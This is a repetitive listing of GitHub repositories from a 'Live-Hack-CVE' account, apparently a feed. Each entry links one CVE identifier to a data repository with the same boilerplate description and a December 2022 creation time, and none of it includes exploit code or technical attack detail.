**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36318 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36318](https://github.com/Live-Hack-CVE/CVE-2021-36318) create time: 2022-12-23T23:13:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36317 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36317](https://github.com/Live-Hack-CVE/CVE-2021-36317) create time: 2022-12-23T23:12:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-42739 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-42739](https://github.com/Live-Hack-CVE/CVE-2021-42739) create time: 2022-12-23T23:12:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3998 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3998](https://github.com/Live-Hack-CVE/CVE-2021-3998) create time: 2022-12-23T23:09:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4214 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4214](https://github.com/Live-Hack-CVE/CVE-2021-4214) create time: 2022-12-23T23:09:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40345 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40345](https://github.com/Live-Hack-CVE/CVE-2021-40345) create time: 2022-12-23T22:37:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33574 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33574](https://github.com/Live-Hack-CVE/CVE-2021-33574) create time: 2022-12-23T22:35:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-35942 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-35942](https://github.com/Live-Hack-CVE/CVE-2021-35942) create time: 2022-12-23T22:35:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40303 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40303](https://github.com/Live-Hack-CVE/CVE-2021-40303) create time: 2022-12-23T22:28:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3928 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3928](https://github.com/Live-Hack-CVE/CVE-2021-3928) create time: 2022-12-23T22:28:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4193 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4193](https://github.com/Live-Hack-CVE/CVE-2021-4193) create time: 2022-12-23T22:28:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-29440 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-29440](https://github.com/Live-Hack-CVE/CVE-2021-29440) create time: 2022-12-23T22:27:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-33743 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-33743](https://github.com/Live-Hack-CVE/CVE-2022-33743) create time: 2022-12-23T23:18:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-31116 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-31116](https://github.com/Live-Hack-CVE/CVE-2022-31116) create time: 2022-12-23T23:18:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20239 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20239](https://github.com/Live-Hack-CVE/CVE-2022-20239) create time: 2022-12-23T23:18:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-0594 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-0594](https://github.com/Live-Hack-CVE/CVE-2022-0594) create time: 2022-12-23T23:18:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43495 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43495](https://github.com/Live-Hack-CVE/CVE-2022-43495) create time: 2022-12-23T23:18:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43451 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43451](https://github.com/Live-Hack-CVE/CVE-2022-43451) create time: 2022-12-23T23:17:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43449 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43449](https://github.com/Live-Hack-CVE/CVE-2022-43449) create time: 2022-12-23T23:17:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32893 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32893](https://github.com/Live-Hack-CVE/CVE-2022-32893) create time: 2022-12-23T23:17:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39177 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39177](https://github.com/Live-Hack-CVE/CVE-2022-39177) create time: 2022-12-23T23:17:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39176 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39176](https://github.com/Live-Hack-CVE/CVE-2022-39176) create time: 2022-12-23T23:16:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-25271 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-25271](https://github.com/Live-Hack-CVE/CVE-2022-25271) create time: 2022-12-23T23:16:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2805 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2805](https://github.com/Live-Hack-CVE/CVE-2022-2805) create time: 2022-12-23T23:16:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43752 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43752](https://github.com/Live-Hack-CVE/CVE-2022-43752) create time: 2022-12-23T23:16:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20951 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20951](https://github.com/Live-Hack-CVE/CVE-2022-20951) create time: 2022-12-23T23:16:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38541 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38541](https://github.com/Live-Hack-CVE/CVE-2022-38541) create time: 2022-12-23T23:16:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41828 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41828](https://github.com/Live-Hack-CVE/CVE-2022-41828) create time: 2022-12-23T23:15:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43561 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43561](https://github.com/Live-Hack-CVE/CVE-2022-43561) create time: 2022-12-23T23:15:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43571 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43571](https://github.com/Live-Hack-CVE/CVE-2022-43571) create time: 2022-12-23T23:15:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38654 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38654](https://github.com/Live-Hack-CVE/CVE-2022-38654) create time: 2022-12-23T23:15:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38660 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38660](https://github.com/Live-Hack-CVE/CVE-2022-38660) create time: 2022-12-23T23:15:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39344 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39344](https://github.com/Live-Hack-CVE/CVE-2022-39344) create time: 2022-12-23T23:15:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-24407 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-24407](https://github.com/Live-Hack-CVE/CVE-2022-24407) create time: 2022-12-23T23:14:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40263 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40263](https://github.com/Live-Hack-CVE/CVE-2022-40263) create time: 2022-12-23T23:14:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42725 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42725](https://github.com/Live-Hack-CVE/CVE-2022-42725) create time: 2022-12-23T23:14:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20937 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20937](https://github.com/Live-Hack-CVE/CVE-2022-20937) create time: 2022-12-23T23:14:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-24082 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-24082](https://github.com/Live-Hack-CVE/CVE-2022-24082) create time: 2022-12-23T23:14:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41222 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41222](https://github.com/Live-Hack-CVE/CVE-2022-41222) create time: 2022-12-23T23:14:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1620 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1620](https://github.com/Live-Hack-CVE/CVE-2022-1620) create time: 2022-12-23T23:14:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1921 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1921](https://github.com/Live-Hack-CVE/CVE-2022-1921) create time: 2022-12-23T23:14:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-22818 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-22818](https://github.com/Live-Hack-CVE/CVE-2022-22818) create time: 2022-12-23T23:13:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2002-20001 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2002-20001](https://github.com/Live-Hack-CVE/CVE-2002-20001) create time: 2022-12-23T21:50:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-18218 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-18218](https://github.com/Live-Hack-CVE/CVE-2019-18218) create time: 2022-12-23T21:50:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-15691 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-15691](https://github.com/Live-Hack-CVE/CVE-2019-15691) create time: 2022-12-23T21:47:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-19947 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-19947](https://github.com/Live-Hack-CVE/CVE-2019-19947) create time: 2022-12-23T21:45:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-21675 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-21675](https://github.com/Live-Hack-CVE/CVE-2020-21675) create time: 2022-12-23T21:55:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35473 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35473](https://github.com/Live-Hack-CVE/CVE-2020-35473) create time: 2022-12-23T21:49:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-23239 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-23239](https://github.com/Live-Hack-CVE/CVE-2021-23239) create time: 2022-12-23T21:55:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-39661 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-39661](https://github.com/Live-Hack-CVE/CVE-2021-39661) create time: 2022-12-23T21:53:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-1050 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-1050](https://github.com/Live-Hack-CVE/CVE-2021-1050) create time: 2022-12-23T21:50:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24555 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24555](https://github.com/Live-Hack-CVE/CVE-2021-24555) create time: 2022-12-23T21:49:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-42205 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-42205](https://github.com/Live-Hack-CVE/CVE-2021-42205) create time: 2022-12-23T21:47:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4160 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4160](https://github.com/Live-Hack-CVE/CVE-2021-4160) create time: 2022-12-23T21:47:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-25094 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-25094](https://github.com/Live-Hack-CVE/CVE-2021-25094) create time: 2022-12-23T21:47:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24730 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24730](https://github.com/Live-Hack-CVE/CVE-2021-24730) create time: 2022-12-23T21:46:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24543 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24543](https://github.com/Live-Hack-CVE/CVE-2021-24543) create time: 2022-12-23T21:46:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24685 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24685](https://github.com/Live-Hack-CVE/CVE-2021-24685) create time: 2022-12-23T21:46:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24570 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24570](https://github.com/Live-Hack-CVE/CVE-2021-24570) create time: 2022-12-23T21:46:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41771 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41771](https://github.com/Live-Hack-CVE/CVE-2021-41771) create time: 2022-12-23T21:45:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24626 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24626](https://github.com/Live-Hack-CVE/CVE-2021-24626) create time: 2022-12-23T21:45:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24695 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24695](https://github.com/Live-Hack-CVE/CVE-2021-24695) create time: 2022-12-23T21:45:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40369 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40369](https://github.com/Live-Hack-CVE/CVE-2021-40369) create time: 2022-12-23T21:45:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24683 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24683](https://github.com/Live-Hack-CVE/CVE-2021-24683) create time: 2022-12-23T21:45:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24651 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24651](https://github.com/Live-Hack-CVE/CVE-2021-24651) create time: 2022-12-23T21:45:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24595 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24595](https://github.com/Live-Hack-CVE/CVE-2021-24595) create time: 2022-12-23T21:45:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24642 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24642](https://github.com/Live-Hack-CVE/CVE-2021-24642) create time: 2022-12-23T21:45:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24615 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24615](https://github.com/Live-Hack-CVE/CVE-2021-24615) create time: 2022-12-23T21:45:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24822 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24822](https://github.com/Live-Hack-CVE/CVE-2021-24822) create time: 2022-12-23T21:45:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-44716 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-44716](https://github.com/Live-Hack-CVE/CVE-2021-44716) create time: 2022-12-23T21:45:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24739 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24739](https://github.com/Live-Hack-CVE/CVE-2021-24739) create time: 2022-12-23T21:44:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37890 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37890](https://github.com/Live-Hack-CVE/CVE-2022-37890) create time: 2022-12-23T21:56:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37891 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37891](https://github.com/Live-Hack-CVE/CVE-2022-37891) create time: 2022-12-23T21:56:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37889 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37889](https://github.com/Live-Hack-CVE/CVE-2022-37889) create time: 2022-12-23T21:56:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37887 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37887](https://github.com/Live-Hack-CVE/CVE-2022-37887) create time: 2022-12-23T21:56:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37894 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37894](https://github.com/Live-Hack-CVE/CVE-2022-37894) create time: 2022-12-23T21:55:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37895 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37895](https://github.com/Live-Hack-CVE/CVE-2022-37895) create time: 2022-12-23T21:55:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37896 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37896](https://github.com/Live-Hack-CVE/CVE-2022-37896) create time: 2022-12-23T21:55:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37893 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37893](https://github.com/Live-Hack-CVE/CVE-2022-37893) create time: 2022-12-23T21:55:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38037 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38037](https://github.com/Live-Hack-CVE/CVE-2022-38037) create time: 2022-12-23T21:55:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32888 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32888](https://github.com/Live-Hack-CVE/CVE-2022-32888) create time: 2022-12-23T21:55:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32923 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32923](https://github.com/Live-Hack-CVE/CVE-2022-32923) create time: 2022-12-23T21:55:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-29959 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-29959](https://github.com/Live-Hack-CVE/CVE-2022-29959) create time: 2022-12-23T21:55:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3537 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3537](https://github.com/Live-Hack-CVE/CVE-2022-3537) create time: 2022-12-23T21:54:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20447 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20447](https://github.com/Live-Hack-CVE/CVE-2022-20447) create time: 2022-12-23T21:54:54Z

